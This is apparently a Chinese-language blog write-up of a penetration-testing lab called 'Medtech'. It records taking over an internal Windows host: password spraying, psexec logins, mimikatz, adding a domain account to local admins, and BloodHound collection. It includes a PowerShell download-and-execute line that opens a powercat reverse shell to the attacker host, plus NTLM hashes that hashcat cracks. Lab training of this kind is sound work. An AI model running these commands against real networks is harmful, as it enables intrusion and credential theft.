Challenge 1 - Medtech(2)
目前為止我們拿下了 .121 外部機器,也知道這一台機器有兩張網路卡
所以下一步進攻順序的機器放在內網的 .11 這一台
這一台作業系統是 Windows 且電腦名稱是 FILES02
於 .121 機器上執行 ping -a 172.16.208.11 得知機器名稱與作業系統
會將這一台當作攻擊的第二順序原因是在拿下 .121 的時候獲得了兩組網域帳號密碼
- medtech.com\offsec:lab
- medtech.com\joe:Flowser1
一旦拿到新的帳號密碼,一定要做密碼噴灑
在 .121 上搭建 chisel 後執行 crackmapexec 後直接看到 joe 是 .11 的管理者
所以才會將這一台鎖定為攻擊順序的第二台
編輯好 usernames.txt & passwords.txt 後執行 └─$ proxychains4 crackmapexec smb 172.16.208.11 -u ./usernames.txt -p ./passwords.txt --continue-on-success
獲得 [+] medtech.com\joe:Flowers1 (Pwn3d!)
直接透過 proxychain 執行 impacket-psexec 進去看看
└─$ proxychains4 -q impacket-psexec joe:Flowers1@172.16.208.11
whoami 看一下確認是管理者
拿取 local.txt & proof.txt flag
開始枚舉 .11, C:\users 底下發現更多使用者帳號 wario、yoshi
上傳 mimikatz.exe,看來 Routing 有直接通,可以從 .11 直接到 kali 下載 mimikatz.exe
執行 mimikatz.exe 後僅發現 local administrator 帳號的 HASH (hashcat 破不出來)
沒有發現其他帳號的相關 HASH,更新帳號密碼表如下
拿下第二台機器,更新攻擊順序表如下
回到 .121 將已知的網域帳號 offsec:lab 加到本機的 Administrators 群組
先查看本機 Administrators 群組成員,Get-LocalGroupMember Administrators
發現指令不能用,所以先行匯入 PowerView.ps1 後再執行即可
加網域使用者到本機群組指令 : net localgroup administrators medtech\offsec /add
使用cmd指令新增、刪除使用者帳號與群組
1. 新增、修改、刪除使用者
建立使用者帳戶,帳號User1 密碼123456
net user user1 123456 /add
修改使用者帳號密碼,帳號User1 密碼改為12345678
net user user1 12345678
刪除使用者帳號User1
net user user1 /del
2. 新增、刪除群組
新增一個 Groups1 群組
net localgroup groups1 /add
刪除 Groups1 群組
net localgroup groups1 /del
3. 新增使用者帳號到指定群組
使用者帳號User1加入至Groups1群組
net localgroup groups1 user1 /add
網域帳號contoso\jack加入至本機Groups1群組
net localgroup groups1 contoso\jack /add
刪除Groups1群組中的使用者帳號User1
net localgroup groups1 user1 /del
加完後再查看一次 Administrators 群組確認 offsec 已經加入
直接用 impacket-psexec 帶 offsec:lab 建一個連線回來
也可以直接 impacket-psexec 進去,但是 Terminal 速度太慢,所以改建一個連線回來
└─$ impacket-psexec medtech.com/offsec:lab@192.168.155.121 "powershell -c IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.45.227/tools/powercat.ps1');powercat -c 192.168.45.227 -p 4445 -e powershell"
4445 Listener 進來了
加網域帳號最主要的目的是要跑 BloodHound
iwr -uri http://192.168.45.227/tools/PowerView.ps1 -Outfile PowerView.ps1
iwr -uri http://192.168.45.227/tools/SharpHound.ps1 -Outfile SharpHound.ps1
Import-Module ./PowerView.ps1
Import-Module ./SharpHound.ps1
Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\Users\offsec\Desktop\ -OutputPrefix "MedTech"
將使用者 offsec、joe 與電腦 WEB02、FILES02 通通 Mark 成 Owned
先查一下 Domain Admin 成員,看來有 Leon、Administrator 兩個
查看 Domain Admin 獲取路徑,暫時沒幫助,但有看到 DEV04 可能是關鍵機器
已有網域帳號,將其他機器的作業系統與名稱列舉一下
172.16.155.10 --> DC01
對外的兩台 192.168.155.120/122 看來都是 Linux Server
172.16.155.12 --> DEV04
172.16.155.13 --> PROD01
172.16.155.14 --> 是一台 Linux
172.16.155.82 --> CLIENT01
172.16.155.83 --> CLIENT02
最後更新 MedTech 電腦列表如下
接著搜尋 AD 所有使用者清單如下
更新使用者清單 username.txt 如下
密碼清單 password.txt 將原有已知的兩個密碼保留,再加入使用者清單
以及使用者清單第一個英文字母大寫,再加上常用的 admin、password 當作密碼更新如下
繼續枚舉 .11 在 joe 底下的 Documents 發現一個檔案 fileMonitorBackup.log
下載回來到 kali
但是 cat 再 grep NTLM 既然無法顯示
用 file 看一下該檔案,結果是用 UTF-16 編碼導致
改用 UTF-16 可以列舉的指令,└─$ iconv -f UTF-16 -t UTF-8 ./fileMonitorBackup.log | fgrep NTLM ,發現四組 NTLM
daisy:abf36048c1cf88f5603381c5128feb8e
toad:5be63a865b65349851c1f11a067a3068
wario:fdf36048c1cf88f5630381c5e38feb8e
goomba:8e9e1516818ce4e54247e71e71b5f436
存成 ntlm.hash 再用 hashcat 破解看看└─$ hashcat -m 1000 ./ntlm.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
fdf36048c1cf88f5630381c5e38feb8e:Mushroom!
利馬測試看看,又獲得一組帳號密碼
└─$ crackmapexec smb 192.168.155.121 -u wario -p 'Mushroom!' --continue-on-success
wario:Mushroom!
帳號密碼表更新如下
留言
張貼留言